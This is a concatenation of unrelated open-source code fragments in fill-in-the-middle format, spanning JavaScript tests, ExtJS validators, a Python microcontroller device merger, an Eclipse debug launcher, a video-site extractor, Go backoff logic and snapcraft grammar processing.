const r = collection.addOne({ name: "bar" });
expect(r.id).toEqual(13);
});
});
describe("updateOne", () => {
it("should throw an exception when trying to update a non-existing item", () => {
const collection = new Collection();
expect(() => {
collection.updateOne(0, { id: 0, name: "bar" });
}).toThrow(new Error("No item with identifier 0"));
});
it("should return the updated item", () => {
const collection = new Collection([{ name: "foo" }]);
expect(collection.updateOne(0, { id: 0, name: "bar" })).toEqual({
id: 0,
name: "bar",
});
});
it("should update the item", () => {
const collection = new Collection([{ name: "foo" }, { name: "baz" }]);
collection.updateOne(0, { id: 0, name: "bar" });
expect(collection.getOne(0)).toEqual({ id: 0, name: "bar" });
expect(collection.getOne(1)).toEqual({ id: 1, name: "baz" });
});
});
describe("removeOne", () => {
it("should throw an exception when trying to remove a non-existing item", () => {
const collection = new Collection();
expect(() => {
collection.removeOne(0);
}).toThrow(new Error("No item with identifier 0"));
});
it("should remove the item", () => {
const collection = new Collection();
const item = collection.addOne({ name: "foo" });
collection.removeOne(item.id);
expect(collection.getAll()).toEqual([]);
});
it("should return the removed item", () => {
const collection = new Collection();
const item = collection.addOne({});
const r = collection.removeOne(item.id);
expect(r).toEqual(item);
});
it("should decrement the sequence only if the removed item is the last", () => {
const collection = new Collection([{ id: 0 }, { id: 1 }, { id: 2 }]);
expect(collection.sequence).toEqual(3);
collection.removeOne(2);
expect(collection.sequence).toEqual(2);
collection.removeOne(0);
expect(collection.sequence).toEqual(2);
const r = collection.addOne({});
expect(r.id).toEqual(2);
});
});
});<|fim▁end|>
|
});
it("should accept a query object", () => {
const collection = new Collection([{}, { name: "a" }, { name: "b" }]);
|
<|file_name|>BasicForm.js<|end_file_name|><|fim▁begin|>Ext.form.BasicForm.override({
resetDirty: function() {
this.items.each(function(field) {
field.resetDirty();
});
},
setDefaultValues: function() {
this.items.each(function(field) {
field.setDefaultValue();
}, this);
},
clearValues: function() {
this.items.each(function(field) {
if (field.rendered) field.clearValue();
}, this);
},
//override stupid Ext behavior
//better to ask the individual form fields
//needed for: Checkbox, ComboBox, SwfUpload, Date...
getValues: function() {
var ret = {};
this.items.each(function(field) {
if (field.getName && field.getName()) {
ret[field.getName()] = field.getValue();
}<|fim▁hole|>});
Ext.apply(Ext.form.VTypes, {
//E-Mail Validierung darf ab Ext 2.2 keine Bindestriche mehr haben, jetzt schon wieder
email: function(v) {
return /^([a-zA-Z0-9_.+-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/.test(v);
},
emailMask : /[a-z0-9_\.\-@+]/i, //include +
urltel: function(v) {
return /^(tel:\/\/[\d\s]+|(((https?)|(ftp)):\/\/([\-\w]+\.)+\w{2,3}(\/[%\-\w]+(\.\w{2,})?)*(([\w\-\.\?\\\/+@&#;`~=%!]*)(\.\w{2,})?)*\/?))+$/.test(v);
},
urltelTest: trlKwf('This field should be a URL in the format "http://www.domain.com" or tel://0043 1234'),
//Ersetzt alles außer a-z, 0-9 - durch _. So wie Kwf_Filter_Ascii
//standard-ext implementierung überschrieben um den - zu erlauben
alphanum: function(v) {
return /^[a-zA-Z0-9_\-]+$/.test(v);
},
alphanumText : trlKwf('This field should only contain letters, numbers, - and _'),
alphanumMask : /[a-z0-9_\-]/i,
num: function(v) {
return /^[0-9]+$/.test(v);
},
numText : trlKwf('This field should only contain numbers'),
numMask : /[0-9]/,
time: function(val, field) {
return /^([0-9]{2}):([0-9]{2}):([0-9]{2})$/i.test(val);
},
timeText: trlKwf('Not a valid time. Must be in the format "12:34:00".'),
timeMask: /[\d:]/i
});<|fim▁end|>
|
}, this);
return ret;
}
|
<|file_name|>merger.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright (c) 2013, Roboterclub Aachen e.V.
# All rights reserved.
#
# The file is part of the xpcc library and is released under the 3-clause BSD
# license. See the file `LICENSE` for the full license governing this code.
# -----------------------------------------------------------------------------
from logger import Logger
class DeviceMerger:
""" DeviceMerger
Merges several devices into logical groups.
Since most Devices have the same peripherals, but differ in other
parameters, like Flash/RAM/EEPROM sizes, packaging or other minor
differences, it makes sense to group them accordingly.
Please not that this class only makes the resulting XML files more user
friendly to manually edit, since the user does not have to apply the
changes to multiple files. Ideally - reality might differ :(.
"""
def __init__(self, devices, logger=None):
self.mergedDevices = list(devices)
if logger == None:
self.log = Logger()
else:
self.log = logger
def mergedByPlatform(self, platform):
if platform == 'avr':
self.mergedByType()
self.mergedByName()
elif platform == 'stm32':
self.mergedBySize()
self.mergedByName()
def mergedByType(self):
self.mergedDevices = self._mergeDevicesByType(self.mergedDevices)
def mergedByName(self):
self.mergedDevices = self._mergeDevicesByName(self.mergedDevices)
def mergedBySize(self):
self.mergedDevices = self._mergeDevicesBySize(self.mergedDevices)
def _mergeDevicesByName(self, devices):
"""
This is a simple helper method to merge devices based on name.
"""
avrDevices = []
xmegaDevices = []
stm32Devices = []
result = []
for dev in devices:
if dev.ids.intersection.platform == 'avr':
if dev.ids.intersection.family == 'xmega':
xmegaDevices.append(dev)
else:
avrDevices.append(dev)
elif dev.ids.intersection.platform == 'stm32':
stm32Devices.append(dev)
else:
result.append(dev)
avrDevices = self._mergeDevicesByNameAVR(avrDevices)
xmegaDevices = self._mergeDevicesByNameXMEGA(xmegaDevices)
stm32Devices = self._mergeDevicesByNameSTM32(stm32Devices)
result.extend(avrDevices)
result.extend(xmegaDevices)
result.extend(stm32Devices)
return result
def _mergeDevicesByNameSTM32(self, devices):
"""
This checks the size-id and name of the devices, and merges the devices
based on the observation, that the size-id only influences the size of
memories, i.e. FLASH, RAM.
"""
# copy the devices, since this array will be modified
devs = list(devices)
merged = []
while len(devs) > 0:
current = devs[0]
devs.remove(current)
matches = []
name_ids = self._getCategoryNameSTM32(current)
size_ids = self._getCategorySizeSTM32(current)
self.log.info("ByName: Searching for device with names '%s' and size-ids '%s'" % (name_ids, size_ids))
for dev in devs:
if dev.ids.getAttribute('name')[0] in name_ids and \
dev.ids.getAttribute('size_id')[0] in size_ids:
matches.append(dev)
for match in matches:
devs.remove(match)
current = current.getMergedDevice(match)
if len(matches) == 0:
self.log.info("ByName: no match for device: " + current.id.string)
self.log.debug("ByName:\nResulting device:\n" + str(current))
merged.append(current)
return merged
def _getCategoryNameSTM32(self, device):
names = device.ids.getAttribute('name')
family = device.id.family
if family == 'f0':
categories = [ ['030', '050', '070'],
['031', '051', '071', '091'],
['042', '072'],
['038', '048', '058', '078', '098']]
elif family == 'f1':
categories = [ ['100'],
['101', '102'],
['103'],
['105', '107'] ]
elif family == 'f2':
categories = [ ['205', '207', '215', '217'] ]
elif family == 'f3':
categories = [ ['301'],
['302'],
['303'],
['334'],
['318', '328', '358', '378', '398'],
['373'] ]
elif family == 'f4':
categories = [ ['401', '411'],
['410'],
['412'],
['405', '415', '407', '417'],
['427', '437', '429', '439'],
['446'],
['469', '479'] ]
elif family == 'f7':
categories = [ ['745', '746', '756'],
['765', '767', '768', '769', '777', '778', '779'] ]
# make sure that only one category is used!
for cat in categories:
if names[0] in cat:
return cat
return categories[0]
def _mergeDevicesByNameXMEGA(self, devices):
"""
This checks the size-id and name of the devices, and merges the devices
based on the observation, that the size-id only influences the size of
memories, i.e. FLASH, RAM, and EEPROM.
"""
# copy the devices, since this array will be modified
devs = list(devices)
merged = []
while len(devs) > 0:
current = devs[0]
devs.remove(current)
matches = []
device_type = current.ids.getAttribute('type')[0]
if device_type != None:
self.log.info("ByName: Searching for device with type '%s'" % device_type)
for dev in devs:
if dev.ids.getAttribute('type')[0] == device_type:
# A3 none|b and bu|u are different enough to warrant
# a new device file
if device_type == 'a3':
if dev.ids.getAttribute('pin_id')[0] in self._getCategoryPinIdAVR(current):
matches.append(dev)
else:
matches.append(dev)
for match in matches:
devs.remove(match)
current = current.getMergedDevice(match)
if len(matches) == 0:
self.log.info("ByName: no match for device: " + current.id.string)
self.log.debug("ByName:\nResulting device:\n" + str(current))
merged.append(current)
return merged
def _mergeDevicesByNameAVR(self, devices):
"""
This checks the size-id and name of the devices, and merges the devices
based on the observation, that the size-id only influences the size of
memories, i.e. FLASH, RAM, and EEPROM.
"""
# copy the devices, since this array will be modified
devs = list(devices)
merged = []
while len(devs) > 0:
current = devs[0]
devs.remove(current)
matches = []
size_id = current.ids.getAttribute('size_id')[0]
if size_id != None:
name = current.ids.getAttribute('name')[0]
device_type = current.ids.getAttribute('type')[0]
family = name[len(size_id):]
if not (family == "" and device_type == None):
device_type = self._getCategoryTypeAVR(current)
self.log.info("ByName: Searching for device ending in '"
+ family + "' and '" + str(device_type) + "'")
for dev in devs:
dname = dev.ids.getAttribute('name')[0]
dsize_id = dev.ids.getAttribute('size_id')[0]
# if they do not have a size-id they are probably unmergable
if dsize_id != None:
dfamily = dname[len(dsize_id):]
# perpare for type comparison
# we should only merge when the family is the same,
# and if the type is the same
if dfamily == family and dev.ids.getAttribute('type')[0] in device_type:
matches.append(dev)
# The following code is Atmel's fault with their stupid naming schemes.
# the AT90's, ATmega's and ATtiny's have special merging rules
if current.id.family == "at90":
name = current.id.name
# Some Devices are just not in the same group
if name in ['1', '2', '3', '216', '316', '646', '647', '1286', '1287']:
# these are not the matches you are looking for *move hand*
matches = []
# these are not the devices you want to matched with
for match in matches:
if match.id.name in ['1', '2', '3', '216', '316', '646', '647', '1286', '1287']:
matches.remove(match)
break
# but these are:
namesA = [ ['1', '2', '216'], ['3', '316'], ['646', '647', '1286', '1287'] ]
for names in namesA:
if name in names:
for dev in [d for d in devs if dev.id.family == "at90"]:
for dname in dev.ids.getAttribute('name'):
if dname in names:
matches.append(dev)
if current.id.family == "atmega":
name = current.id.name
if current.ids.getAttribute('type')[0] in [None, 'none', 'p', 'a', 'pa']:
# Some Devices are just not in the same group
if name in ['8', '16', '32', '64', '128']:
# these are not the matches you are looking for *move hand*
matches = []
# these are not the devices you want to be matched with
for match in matches:
if match.id.name in ['8', '16', '32', '64', '128']:
matches.remove(match)
break
# but these are:
namesA = [ ['16', '32'], ['64', '128'] ]
for names in namesA:
if name in names:
for dev in devs:
if dev.id.family == "atmega" and dev.ids.getAttribute('type')[0] in [None, 'none', 'p', 'a', 'pa']:
for dname in dev.ids.getAttribute('name'):
if dname in names:
matches.append(dev)
if current.id.family == "attiny":
name = current.id.name
names = ['4', '5', '9', '10']
if name in names:
for dev in devs:
if dev.id.family == "attiny":
for dname in dev.ids.getAttribute('name'):
if dname in names:
matches.append(dev)
# Some Devices are just not in the same group
if name in ['28', '20', '40']:
# these are not the matches you are looking for *move hand*
matches = []
# these are not the devices you want to matched with
for match in matches:
if match.id.name in ['28', '20', '40']:
matches.remove(match)
break
for match in matches:
devs.remove(match)
current = current.getMergedDevice(match)
if len(matches) == 0:
self.log.info("ByName: no match for device: " + current.id.string)
self.log.debug("ByName:\nResulting device:\n" + str(current))
merged.append(current)
return merged
def _mergeDevicesBySize(self, devices):
"""
This is a simple helper method to merge devices based on size.
"""
stm32Devices = []
result = []
for dev in devices:
if dev.id.platform == 'stm32':
stm32Devices.append(dev)
else:
result.append(dev)
stm32Devices = self._mergeDevicesBySizeSTM32(stm32Devices)
result.extend(stm32Devices)
return result
def _mergeDevicesBySizeSTM32(self, devices):
"""
This checks the size-id and name of the devices, and merges the devices
based on the observation, that the size-id only influences the size of
memories, i.e. FLASH, RAM.
"""
# copy the devices, since this array will be modified
devs = list(devices)
merged = []
while len(devs) > 0:
current = devs[0]
devs.remove(current)
matches = []
size_ids = self._getCategorySizeSTM32(current)
name = current.ids.getAttribute('name')[0]
self.log.info("BySize: Searching for device with size-id '%s'" % size_ids)
for dev in devs:
if dev.ids.getAttribute('name')[0] == name and \
dev.ids.getAttribute('size_id')[0] in size_ids:
matches.append(dev)
matches.sort(key=lambda k : int(k.getProperty('pin-count').values[0].value), reverse=True)
for match in matches:
devs.remove(match)
current = current.getMergedDevice(match)
if len(matches) == 0:
self.log.info("BySize: no match for device: " + current.id.string)
self.log.debug("BySize:\nResulting device:\n" + str(current))
merged.append(current)
return merged
def _getCategorySizeSTM32(self, device):
size_ids = device.ids.getAttribute('size_id')
family = device.id.family
name = device.ids.getAttribute('name')[0]
# these categories are dependent on name
# these are the categories of mergeable size-ids
if family == 'f0':
categories = [ ['4', '6'],
['8'],
['b', 'c'] ]
if name in ['072', '042']:
categories = [['4', '6'], ['8', 'b']]
elif family == 'f1':
categories = [ ['4', '6'], # low density
['8', 'b'], # medium density
['c', 'd', 'e'], # high density
['f', 'g'] ] # super high density
if name in ['105', '107']:
categories = [ ['8', 'b', 'c'] ] # medium and high density
elif family == 'f2':
categories = [ ['b', 'c', 'd', 'e', 'f', 'g'] ] # high density
elif family == 'f3':
categories = [ ['4', '6', '8'], ['b', 'c', 'd', 'e'] ]
if name in ['373']:
categories = [['8', 'b', 'c']]
elif family == 'f4':
categories = [ ['8', 'b', 'c', 'd'],
['e', 'g', 'i'] ]
if name in ['401']:
categories = [ ['b', 'c', 'd', 'e'] ]
if name in ['411', '412', '446']:
categories = [['c', 'e', 'g']]
elif family == 'f7':
categories = [['e', 'g', 'i']]
# make sure that only one category is used!
for cat in categories:
if size_ids[0] in cat:
return cat
return categories[0]
def _mergeDevicesByType(self, devices):
"""
This is a simple helper method to merge devices based on type.
"""
avrDevices = []
result = []
for dev in devices:
if dev.id.platform == 'avr' and dev.id.family != 'xmega':
avrDevices.append(dev)
else:
result.append(dev)
avrDevices = self._mergeDevicesByTypeAVR(avrDevices)
result.extend(avrDevices)
return result
def _mergeDevicesByTypeAVR(self, devices):
"""
This checks the name suffix (for example 'P', 'A', 'PA') of the
devices and merges them based on the observation, that the suffix
does not have anything to do with the mapping of peripherals.
"""
devs = list(devices)
merged = []
while len(devs) > 0:
current = devs[0]
devs.remove(current)
props = current.id
if props.valid == False:
continue
matches = []
suffix = self._getCategoryTypeAVR(current)
self.log.info("ByType: Searching for device ending in " + str(suffix))
for dev in devs:<|fim▁hole|> matches.append(dev)
for match in matches:
devs.remove(match)
current = current.getMergedDevice(match)
if len(matches) == 0:
self.log.info("ByType: No match for device: " + current.id.string)
self.log.debug("ByType:\nResulting device:\n" + str(current))
merged.append(current)
return merged
def _getCategoryPinIdAVR(self, device):
device_type = device.ids.getAttribute('pin_id')[0]
# these are the categories of mergable types
categories = [ # Xmega devices
[None, 'none', 'b'],
['bu', 'u'],
]
# make sure that only one category is used!
for cat in categories:
if device_type in cat:
return cat
return categories[0]
def _getCategoryTypeAVR(self, device):
device_type = device.ids.getAttribute('type')[0]
# these are the categories of mergable types
categories = [ # ATmega devices
[None, 'none', 'p', 'a', 'pa'],
['rfa1', 'rfa2', 'rfr1', 'rfr2'],
['hvb', 'hvbrevb'],
['hve2'],
['hva'],
['u2'],
['u4', 'u6'],
['m1', 'c1'],
# AT90 devices
['can'],
['pwm'],
['usb'],
]
# make sure that only one category is used!
for cat in categories:
if device_type in cat:
return cat
return categories[0]<|fim▁end|>
|
if dev.id.name == props.name and dev.id.type in suffix:
|
<|file_name|>banner_min.js<|end_file_name|><|fim▁begin|>/*! @license pzprv3-ui.js v<%= pkg.version %> (c) 2009-<%= grunt.template.today('yyyy') %> <%= pkg.author %>, MIT license<|fim▁hole|><|fim▁end|>
|
* https://bitbucket.org/sabo2/pzprv3 */
|
<|file_name|>DebugActionDelegate.java<|end_file_name|><|fim▁begin|>/* COPYRIGHT-ENEA-SRC-R2 *
**************************************************************************
* Copyright (C) 2005-2007 by Enea Software AB.
* All rights reserved.
*
* This Software is furnished under a software license agreement and
* may be used only in accordance with the terms of such agreement.
* Any other use or reproduction is prohibited. No title to and
* ownership of the Software is hereby transferred.
*
* PROPRIETARY NOTICE
* This Software consists of confidential information.
* Trade secret law and copyright law protect this Software.
* The above notice of copyright on this Software does not indicate
* any actual or intended publication of such Software.
**************************************************************************
* COPYRIGHT-END */
package com.ose.cdt.launch.internal;
import org.eclipse.cdt.debug.core.ICDTLaunchConfigurationConstants;
import org.eclipse.cdt.debug.mi.core.IMILaunchConfigurationConstants;
import org.eclipse.core.runtime.CoreException;
import org.eclipse.debug.core.DebugPlugin;
import org.eclipse.debug.core.ILaunchConfiguration;
import org.eclipse.debug.core.ILaunchConfigurationType;
import org.eclipse.debug.core.ILaunchConfigurationWorkingCopy;
import org.eclipse.debug.core.ILaunchManager;
import org.eclipse.debug.ui.IDebugUIConstants;
import org.eclipse.jface.action.IAction;
import org.eclipse.jface.viewers.ISelection;
import org.eclipse.jface.viewers.IStructuredSelection;
import com.ose.cdt.debug.mi.core.GDBDebugger;
import com.ose.cdt.debug.mi.core.IOSEMILaunchConfigurationConstants;
import com.ose.cdt.launch.internal.ui.LaunchUIPlugin;
import com.ose.launch.IOSELaunchConfigurationConstants;
import com.ose.system.Block;
import com.ose.system.Gate;
import com.ose.system.Process;
import com.ose.system.SystemModelNode;
import com.ose.system.Target;
public class DebugActionDelegate extends LaunchActionDelegate
{
private Process node;
public void selectionChanged(IAction action, ISelection selection)
{
Object obj = null;
if (selection instanceof IStructuredSelection)
{
obj = ((IStructuredSelection) selection).getFirstElement();
}
node = ((obj instanceof Process) ? ((Process) obj) : null);
}
protected SystemModelNode getSystemModelNode()
{
return node;
}
protected String getLaunchMode()
{
return ILaunchManager.DEBUG_MODE;
}
protected String getLaunchGroup()
{
return IDebugUIConstants.ID_DEBUG_LAUNCH_GROUP;
}
protected ILaunchConfigurationType getLaunchConfigurationType()
{
String configTypeId;
ILaunchConfigurationType configType;
if (node == null)
{
throw new IllegalStateException();
}
configTypeId = (node.getTarget().isPostMortemMonitor() ?
IOSELaunchConfigurationConstants.ID_LAUNCH_DUMP :
(node.getBlock().getSid() == 0) ?
IOSELaunchConfigurationConstants.ID_LAUNCH_CORE_MODULE :
IOSELaunchConfigurationConstants.ID_LAUNCH_LOAD_MODULE);
configType = DebugPlugin.getDefault().getLaunchManager()
.getLaunchConfigurationType(configTypeId);
return configType;
}
protected ILaunchConfiguration editLaunchConfiguration(
ILaunchConfigurationWorkingCopy wc,
String configTypeId,
SystemModelNode node)
{
ILaunchConfiguration config = null;
if (!(node instanceof Process))
{
return null;
}
try
{
Process process = (Process) node;
Block block = process.getBlock();
Target target = block.getTarget();
Gate gate = target.getGate();
wc.setAttribute(
IOSELaunchConfigurationConstants.ATTR_GATE_ADDRESS,
gate.getAddress().getHostAddress());
wc.setAttribute(
IOSELaunchConfigurationConstants.ATTR_GATE_PORT,
gate.getPort());
wc.setAttribute(
IOSELaunchConfigurationConstants.ATTR_TARGET_HUNT_PATH,
target.getHuntPath());
if (configTypeId.equals(IOSELaunchConfigurationConstants.ID_LAUNCH_CORE_MODULE))
{
wc.setAttribute(
IOSELaunchConfigurationConstants.ATTR_BOOT_DOWNLOAD,
false);
}
else if (configTypeId.equals(IOSELaunchConfigurationConstants.ID_LAUNCH_LOAD_MODULE))
{
wc.setAttribute(
IOSELaunchConfigurationConstants.ATTR_LM_DOWNLOAD,
false);
}
else if (configTypeId.equals(IOSELaunchConfigurationConstants.ID_LAUNCH_DUMP))
{
wc.setAttribute(
IOSELaunchConfigurationConstants.ATTR_DUMP_MONITOR_MANAGED,
false);<|fim▁hole|> wc.setAttribute(ICDTLaunchConfigurationConstants.ATTR_DEBUGGER_ID,
IOSEMILaunchConfigurationConstants.OSE_DEBUGGER_ID);
if (target.isPostMortemMonitor())
{
wc.setAttribute(
ICDTLaunchConfigurationConstants.ATTR_DEBUGGER_START_MODE,
ICDTLaunchConfigurationConstants.DEBUGGER_MODE_CORE);
}
else
{
wc.setAttribute(
ICDTLaunchConfigurationConstants.ATTR_DEBUGGER_START_MODE,
ICDTLaunchConfigurationConstants.DEBUGGER_MODE_RUN);
}
wc.setAttribute(
ICDTLaunchConfigurationConstants.ATTR_DEBUGGER_STOP_AT_MAIN,
false);
wc.setAttribute(IMILaunchConfigurationConstants.ATTR_DEBUGGER_PROTOCOL,
"mi");
if (wc.getAttribute(IMILaunchConfigurationConstants.ATTR_DEBUG_NAME,
(String) null) == null)
{
wc.setAttribute(IMILaunchConfigurationConstants.ATTR_DEBUG_NAME,
getGDB(process));
}
wc.setAttribute(IOSEMILaunchConfigurationConstants.ATTR_DEBUG_SCOPE,
getDebugScope());
wc.setAttribute(IOSEMILaunchConfigurationConstants.ATTR_SEGMENT_ID,
"0x" + Integer.toHexString(block.getSid()).toUpperCase());
wc.setAttribute(IOSEMILaunchConfigurationConstants.ATTR_BLOCK_ID,
"0x" + Integer.toHexString(process.getBid()).toUpperCase());
wc.setAttribute(IOSEMILaunchConfigurationConstants.ATTR_PROCESS_ID,
"0x" + Integer.toHexString(process.getId()).toUpperCase());
config = wc.doSave();
}
catch (CoreException e)
{
LaunchUIPlugin.log(e);
}
return config;
}
private static String getGDB(Process process)
{
String gdbName;
String gdbPath;
switch (process.getTarget().getCpuType())
{
case Target.CPU_ARM:
gdbName = IOSEMILaunchConfigurationConstants.VALUE_DEBUG_NAME_ARM;
break;
case Target.CPU_MIPS:
gdbName = IOSEMILaunchConfigurationConstants.VALUE_DEBUG_NAME_MIPS;
break;
case Target.CPU_PPC:
gdbName = IOSEMILaunchConfigurationConstants.VALUE_DEBUG_NAME_POWERPC;
break;
default:
return IOSEMILaunchConfigurationConstants.VALUE_DEBUG_NAME_NATIVE;
}
gdbPath = GDBDebugger.findGDB(gdbName);
return ((gdbPath != null) ? gdbPath : gdbName);
}
}<|fim▁end|>
|
}
|
<|file_name|>anysex.py<|end_file_name|><|fim▁begin|>from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
parse_duration,
int_or_none,
)
class AnySexIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?anysex\.com/(?P<id>\d+)'
_TEST = {<|fim▁hole|> 'id': '156592',
'ext': 'mp4',
'title': 'Busty and sexy blondie in her bikini strips for you',
'description': 'md5:de9e418178e2931c10b62966474e1383',
'categories': ['Erotic'],
'duration': 270,
'age_limit': 18,
}
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
webpage = self._download_webpage(url, video_id)
video_url = self._html_search_regex(r"video_url\s*:\s*'([^']+)'", webpage, 'video URL')
title = self._html_search_regex(r'<title>(.*?)</title>', webpage, 'title')
description = self._html_search_regex(
r'<div class="description"[^>]*>([^<]+)</div>', webpage, 'description', fatal=False)
thumbnail = self._html_search_regex(
r'preview_url\s*:\s*\'(.*?)\'', webpage, 'thumbnail', fatal=False)
categories = re.findall(
r'<a href="http://anysex\.com/categories/[^"]+" title="[^"]*">([^<]+)</a>', webpage)
duration = parse_duration(self._search_regex(
r'<b>Duration:</b> (?:<q itemprop="duration">)?(\d+:\d+)', webpage, 'duration', fatal=False))
view_count = int_or_none(self._html_search_regex(
r'<b>Views:</b> (\d+)', webpage, 'view count', fatal=False))
return {
'id': video_id,
'url': video_url,
'ext': 'mp4',
'title': title,
'description': description,
'thumbnail': thumbnail,
'categories': categories,
'duration': duration,
'view_count': view_count,
'age_limit': 18,
}<|fim▁end|>
|
'url': 'http://anysex.com/156592/',
'md5': '023e9fbb7f7987f5529a394c34ad3d3d',
'info_dict': {
|
<|file_name|>backoff.go<|end_file_name|><|fim▁begin|>package backoff
import (
"math"
"time"
"github.com/quan-xie/tuba/util/xtime"
)
// Backoff interface defines contract for backoff strategies
type Backoff interface {
Next(retry int) time.Duration
}
type constantBackoff struct {
backoffInterval xtime.Duration
}
// NewConstantBackoff returns an instance of ConstantBackoff
func NewConstantBackoff(backoffInterval xtime.Duration) Backoff {
return &constantBackoff{backoffInterval: backoffInterval}
}
// Next returns next time for retrying operation with constant strategy
func (cb *constantBackoff) Next(retry int) time.Duration {
if retry <= 0 {
return 0 * time.Millisecond
}
return time.Duration(cb.backoffInterval) * 1 << uint(retry)
}
type exponentialBackoff struct {
exponentFactor float64
initialTimeout float64
maxTimeout float64
}
// NewExponentialBackoff returns an instance of ExponentialBackoff
func NewExponentialBackoff(initialTimeout, maxTimeout time.Duration, exponentFactor float64) Backoff {
return &exponentialBackoff{
exponentFactor: exponentFactor,
initialTimeout: float64(initialTimeout / time.Millisecond),<|fim▁hole|>
// Next returns next time for retrying operation with exponential strategy
func (eb *exponentialBackoff) Next(retry int) time.Duration {
if retry <= 0 {
return 0 * time.Millisecond
}
return time.Duration(math.Min(eb.initialTimeout+math.Pow(eb.exponentFactor, float64(retry)), eb.maxTimeout)) * time.Millisecond
}<|fim▁end|>
|
maxTimeout: float64(maxTimeout / time.Millisecond),
}
}
|
<|file_name|>_part_grammar_processor.py<|end_file_name|><|fim▁begin|># -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2017 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#<|fim▁hole|># along with this program. If not, see <http://www.gnu.org/licenses/>.
from typing import Any, Dict, Set
from snapcraft import project
from snapcraft.internal.project_loader import grammar
from snapcraft.internal import pluginhandler, repo
from ._package_transformer import package_transformer
class PartGrammarProcessor:
"""Process part properties that support grammar.
Stage packages example:
>>> from unittest import mock
>>> import snapcraft
>>> # Pretend that all packages are valid
>>> repo = mock.Mock()
>>> repo.is_valid.return_value = True
>>> plugin = mock.Mock()
>>> plugin.stage_packages = [{'try': ['foo']}]
>>> processor = PartGrammarProcessor(
... plugin=plugin,
... properties={},
... project=snapcraft.project.Project(),
... repo=repo)
>>> processor.get_stage_packages()
{'foo'}
Build packages example:
>>> from unittest import mock
>>> import snapcraft
>>> # Pretend that all packages are valid
>>> repo = mock.Mock()
>>> repo.is_valid.return_value = True
>>> plugin = mock.Mock()
>>> plugin.build_packages = [{'try': ['foo']}]
>>> processor = PartGrammarProcessor(
... plugin=plugin,
... properties={},
... project=snapcraft.project.Project(),
... repo=repo)
>>> processor.get_build_packages()
{'foo'}
Source example:
>>> from unittest import mock
>>> import snapcraft
>>> plugin = mock.Mock()
>>> plugin.properties = {'source': [{'on amd64': 'foo'}, 'else fail']}
>>> processor = PartGrammarProcessor(
... plugin=plugin,
... properties=plugin.properties,
... project=snapcraft.project.Project(),
... repo=None)
>>> processor.get_source()
'foo'
"""
def __init__(
self,
*,
plugin: pluginhandler.PluginHandler,
properties: Dict[str, Any],
project: project.Project,
repo: "repo.Ubuntu"
) -> None:
self._project = project
self._repo = repo
self._build_snap_grammar = getattr(plugin, "build_snaps", [])
self.__build_snaps = set() # type: Set[str]
self._build_package_grammar = getattr(plugin, "build_packages", [])
self.__build_packages = set() # type: Set[str]
self._stage_package_grammar = getattr(plugin, "stage_packages", [])
self.__stage_packages = set() # type: Set[str]
source_grammar = properties.get("source", [""])
if not isinstance(source_grammar, list):
self._source_grammar = [source_grammar]
else:
self._source_grammar = source_grammar
self.__source = ""
def get_source(self) -> str:
if not self.__source:
# The grammar is array-based, even though we only support a single
# source.
processor = grammar.GrammarProcessor(
self._source_grammar, self._project, lambda s: True
)
source_array = processor.process()
if len(source_array) > 0:
self.__source = source_array.pop()
return self.__source
def get_build_snaps(self) -> Set[str]:
if not self.__build_snaps:
processor = grammar.GrammarProcessor(
self._build_snap_grammar,
self._project,
repo.snaps.SnapPackage.is_valid_snap,
)
self.__build_snaps = processor.process()
return self.__build_snaps
def get_build_packages(self) -> Set[str]:
if not self.__build_packages:
processor = grammar.GrammarProcessor(
self._build_package_grammar,
self._project,
self._repo.build_package_is_valid,
transformer=package_transformer,
)
self.__build_packages = processor.process()
return self.__build_packages
def get_stage_packages(self) -> Set[str]:
if not self.__stage_packages:
processor = grammar.GrammarProcessor(
self._stage_package_grammar,
self._project,
self._repo.is_valid,
transformer=package_transformer,
)
self.__stage_packages = processor.process()
return self.__stage_packages<|fim▁end|>
|
# You should have received a copy of the GNU General Public License
|
<|file_name|>KonfigurationEventTest.java<|end_file_name|><|fim▁begin|><|fim▁hole|>import static java.time.LocalDateTime.now;
import static org.assertj.core.api.Assertions.assertThat;
public class KonfigurationEventTest {
@Test
public void test() {
KonfigurationEvent konfigurationEvent = new KonfigurationEvent(now(), now(), "@Konfiguration",
"Max:16\nMin: 4");
assertThat(konfigurationEvent.getMax()).isEqualTo(16);
assertThat(konfigurationEvent.getMin()).isEqualTo(4);
}
}<|fim▁end|>
|
package buchungstool.model.importer;
import org.junit.Test;
|
<|file_name|>setup.py<|end_file_name|><|fim▁begin|>from setuptools import setup
setup(name='pyyaxml',
version='0.6.7',
description='Python API to Yandex.XML',
url='https://github.com/dbf256/py-ya-xml',
author='Alexey Moskvin',
author_email='dbf256@gmail.com',
license='MIT',
packages=['pyyaxml'],
install_requires=[<|fim▁hole|><|fim▁end|>
|
'six',
],
zip_safe=False)
|
<|file_name|>elasticsearch_backend.py<|end_file_name|><|fim▁begin|>from __future__ import unicode_literals
import datetime
import re
import warnings
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.db.models.loading import get_model
from django.utils import six
import haystack
from haystack.backends import BaseEngine, BaseSearchBackend, BaseSearchQuery, log_query
from haystack.constants import ID, DJANGO_CT, DJANGO_ID, DEFAULT_OPERATOR
from haystack.exceptions import MissingDependency, MoreLikeThisError
from haystack.inputs import PythonData, Clean, Exact, Raw
from haystack.models import SearchResult
from haystack.utils import get_identifier
from haystack.utils import log as logging
try:
import requests
except ImportError:
raise MissingDependency("The 'elasticsearch' backend requires the installation of 'requests'.")
try:
import pyelasticsearch
except ImportError:
raise MissingDependency("The 'elasticsearch' backend requires the installation of 'pyelasticsearch'. Please refer to the documentation.")
DATETIME_REGEX = re.compile(
r'^(?P<year>\d{4})-(?P<month>\d{2})-(?P<day>\d{2})T'
